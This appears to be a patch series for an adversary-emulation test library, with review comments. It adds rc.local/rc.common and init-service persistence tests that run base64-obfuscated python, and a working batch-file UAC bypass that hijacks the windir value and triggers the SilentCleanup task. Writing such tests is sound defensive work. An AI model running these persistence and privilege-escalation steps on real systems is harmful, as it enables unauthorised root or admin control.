From cec771d64f0dc6c4464b247e58b835c0fcbcc49a Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Sat, 29 May 2021 14:54:22 -0700 Subject: [PATCH 01/14] Add test for T1037.004 that modifies rc.local and rc.common files on Linux --- atomics/T1037.004/T1037.004.yaml | 37 ++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 8b664b82..9ec58a6f 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml 
@@ -15,3 +15,40 @@ atomic_tests: elevation_required: true name: bash + +- name: rc.common + description: | + Modify rc.common + + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: | + origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi + +- name: rc.local + description: | + Modify rc.local + + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: | + origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + From b19ac6e34e088a8461c9287fbbd033c554d5c27f Mon Sep 17 00:00:00 2001 
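Review bot: in the `command:` of both tests added in PATCH 01/14, `printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common` replaces the whole file rather than modifying it, and running the test twice before cleanup copies the already-modified file over `/etc/rc.common.original`, so the real original is lost; either append to the existing script with `tee -a` or guard the backup with `[ ! -f /etc/rc.common.original ]` (same for rc.local). The descriptions "Modify rc.common" / "Modify rc.local" should also say what the base64 payload does (decoded, it is `import os` / `os.popen('echo atomic test for modifying rc.common > /tmp/T1037.004.rc.common')`, i.e. it drops a marker file) so a tester knows what to verify after the reboot that actually fires the script, and should state that the ATT&CK text quoted later in this series ties rc.common to macOS startup items while only rc.local is picked up by Ubuntu's systemd compatibility, so on Linux the rc.common test exercises file creation rather than execution.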
From: madhavbhatt Date: Sat, 29 May 2021 22:48:31 -0700 Subject: [PATCH 02/14] Update T1037.004.md : Atomic Doc Generated using bin/generate-atomic-docs.rb --- atomics/T1137.004/T1137.004.md | 102 ++++++++++++++++++++++++++------- 1 file changed, 81 insertions(+), 21 deletions(-) diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 858ef875..5e258a38 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -1,45 +1,105 @@ -# T1137.004 - Outlook Home Page -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) -
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) +# T1037.004 - RC Scripts +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) +
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. -Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) -
+Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + +Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + +Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
## Atomic Tests -- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence) +- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) + +- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) + +- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
-## Atomic Test #1 - Install Outlook Home Page Persistence -This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. +## Atomic Test #1 - rc.common +Modify rc.common -Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). +[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) -**Supported Platforms:** Windows +**Supported Platforms:** macOS -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| -| outlook_version | Version of Outlook that is installed | string | 16.0| -| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -#### Attack Commands: Run with `command_prompt`! +```bash +sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common +``` -```cmd -reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f + + + + +
+
+ +## Atomic Test #2 - rc.common +Modify rc.common + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common +sudo chmod +x /etc/rc.common ``` #### Cleanup Commands: -```cmd -reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f +```bash +origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi +``` + + + + + +
+
+ +## Atomic Test #3 - rc.local +Modify rc.local + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local +sudo chmod +x /etc/rc.local +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi ``` From 557bd84925f3f2914fd5b6c6608abcbc82b9549e Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Tue, 1 Jun 2021 19:56:20 -0700 Subject: [PATCH 03/14] Atomic Tests for T1543.002 : Ubuntu, CentOS, Kali --- atomics/T1543.002/T1543.002.md | 65 ++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index c9bfec54..6f2f4e4b 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) +- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) +
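Review bot: PATCH 02/14 writes the regenerated T1037.004 (RC Scripts) documentation into the wrong file: its diff header is `diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md`, and the hunk deletes the entire "T1137.004 - Outlook Home Page" page (description, inputs table, the `reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} ...` attack and cleanup commands) and replaces it with the RC Scripts content. The generated markdown belongs in `atomics/T1037.004/T1037.004.md`; this commit should be redone so T1137.004.md is left untouched. The generated page also lists the new Linux test as "Atomic Test #2 - rc.common", the same title as the macOS "Atomic Test #1 - rc.common", so the YAML `name:` fields should be made distinct (for example by platform) before regenerating.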
@@ -75,4 +77,67 @@ systemctl daemon-reload +
+
+ +## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +cat > /etc/init.d/T1543.002 << EOF +#!/bin/bash +### BEGIN INIT INFO +# Provides : Atomic Test T1543.002 +# Required-Start: $all +# Required-Stop : +# Default-Start: 2 3 4 5 +# Default-Stop: +# Short Description: Atomic Test for Systemd Service Creation +### END INIT INFO +python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" +EOF + +chmod +x /etc/init.d/T1543.002 +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; +systemctl enable T1543.002 +systemctl start T1543.002 + +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 +systemctl daemon-reload +systemctl restart T1543.002 +``` + +#### Cleanup Commands: +```bash +systemctl stop T1543.002 +systemctl disable T1543.002 +rm -rf /etc/init.d/T1543.002 +systemctl daemon-reload +``` + + + +#### Dependencies: Run with `bash`! +##### Description: System must be Ubuntu ,Kali OR CentOS. 
+##### Check Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +``` +##### Get Prereq Commands: +```bash +echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. +``` + + + +
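Review bot: in PATCH 03/14 the new test is added only to `atomics/T1543.002/T1543.002.md`, which is a generated file (see the CI "Generate docs" commits later in this series), so it will be overwritten on the next doc run; define the test in `atomics/T1543.002/T1543.002.yaml` and regenerate the markdown from it. Within the hunk, the prereq check `then exit /b 0; else exit /b 1; fi;` uses cmd.exe syntax: in bash `exit /b` is a non-numeric argument, so both branches fail with a non-zero status and the dependency check can never pass; use `exit 0` / `exit 1`. The `[ $(cat /etc/os-release | grep -i ID=ubuntu) ]` conditions are fragile (unquoted expansion of grep output) and read better as `grep -qi '^ID=ubuntu' /etc/os-release`. The title promises a "Systemd Service unit file", but the commands write a SysV init script to `/etc/init.d/T1543.002` that systemd only wraps through its sysv generator; either create a real unit under `/etc/systemd/system/` or retitle the test so anyone building detections on unit-file creation knows what telemetry to expect. The cleanup should also drop the rc*.d links registered by `update-rc.d T1543.002 defaults` / `chkconfig T1543.002 on` (with `update-rc.d T1543.002 remove` / `chkconfig --del T1543.002`), and `rm -rf` on a single file and the lone `sudo tee -a` in an already-elevated test are inconsistent with the rest of the commands.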
From 980c7e8bd56019b4a11b37e67231c81ee50d596a Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 2 Jun 2021 21:48:22 -0500 Subject: [PATCH 04/14] T1548.002-Update (#1492) * T1548.002-Update * formatting Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1548.002/T1548.002.yaml | 25 +++++++++++++++++++++++++ atomics/T1548.002/src/T1548.002.bat | 8 ++++++++ 2 files changed, 33 insertions(+) create mode 100644 atomics/T1548.002/src/T1548.002.bat diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 5186a236..17eb59f5 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -162,3 +162,28 @@ atomic_tests: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f name: command_prompt elevation_required: true +- name: Bypass UAC using SilentCleanup task + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: | + #{file_path} + name: command_prompt + elevation_required: false 
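Review bot: the description in the T1548.002.yaml hunk of PATCH 04/14 does not match the script it points to: it says the `windir` value is set to `"cmd /k REM "`, while `src/T1548.002.bat` sets `cmd /c start powershell&REM `, and it has the typo "kye" (key). More importantly the test has no `cleanup_command`: the `reg delete "HKCU\Environment" /v "windir" /F` that undoes the change lives at the end of the batch file, so if the script is interrupted after its `reg add`, the user's `windir` override persists in `HKCU\Environment` and every new process in that session inherits a bogus `%windir%`. Move the `reg delete` into `cleanup_command` (it can stay in the bat as well) and add a dependency check that the `\Microsoft\Windows\DiskCleanup\SilentCleanup` task exists (`schtasks /query /tn \Microsoft\Windows\DiskCleanup\SilentCleanup`), since the test is a silent no-op where it has been removed or disabled.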
diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat new file mode 100644 index 00000000..d873b527 --- /dev/null +++ b/atomics/T1548.002/src/T1548.002.bat @@ -0,0 +1,8 @@ +@echo off +mode 18,1 +color FE +reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul +timeout /t 2 >nul +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul +timeout /t 3 >nul +reg delete "HKCU\Environment" /v "windir" /F \ No newline at end of file From 3726625d5809ae768d509383753c58418103674d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 3 Jun 2021 02:48:38 +0000 Subject: [PATCH 05/14] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1548.002/T1548.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 17eb59f5..619b5f6a 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -163,6 +163,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 description: | Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7d1c8c5d..361e31fb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -704,3 +704,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 788e0019-a483-45da-bcfe-96353d46820f 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff +28104f8a-4ff1-4582-bcf6-699dce156608 From 7549cc7d616fc60542f2aedefe1ed2db0b336f7b Mon Sep 17 00:00:00 2001 
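Review bot: in the new `T1548.002.bat` hunk of PATCH 04/14, `mode 18,1` and `color FE` only shrink and recolour the console window and should be dropped from a test script, and the fixed `timeout /t 2` / `timeout /t 3` waits are a race: if the SilentCleanup task takes longer than 3 seconds to start, `reg delete` removes the `windir` value before the task reads it and the test silently exercises nothing, with no indication either way. Poll `schtasks /query /tn \Microsoft\Windows\DiskCleanup\SilentCleanup` until the task leaves the Running state before deleting the value, or at least document the timing assumption. The file is also missing a trailing newline (`\ No newline at end of file`).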
From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 02:48:44 +0000 Subject: [PATCH 06/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 50 +++++++++++++++++++ atomics/T1548.002/T1548.002.md | 41 +++++++++++++++ 6 files changed, 99 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e84bab59..8f816a2c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell 
@@ -215,6 +216,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e3a45879..703da0de 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell 
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3a916e39..d1a78b05 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -227,6 +227,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] 
@@ -417,6 +418,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6433b60d..d1f5864e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -178,6 +178,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -308,6 +309,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index af7d14dd..375f275d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -10120,6 +10120,31 @@ privilege-escalation: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1574.012: technique: external_references: 
@@ -19315,6 +19340,31 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1218.003: technique: external_references: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 98064122..597dc756 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia - [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe) +- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task) +
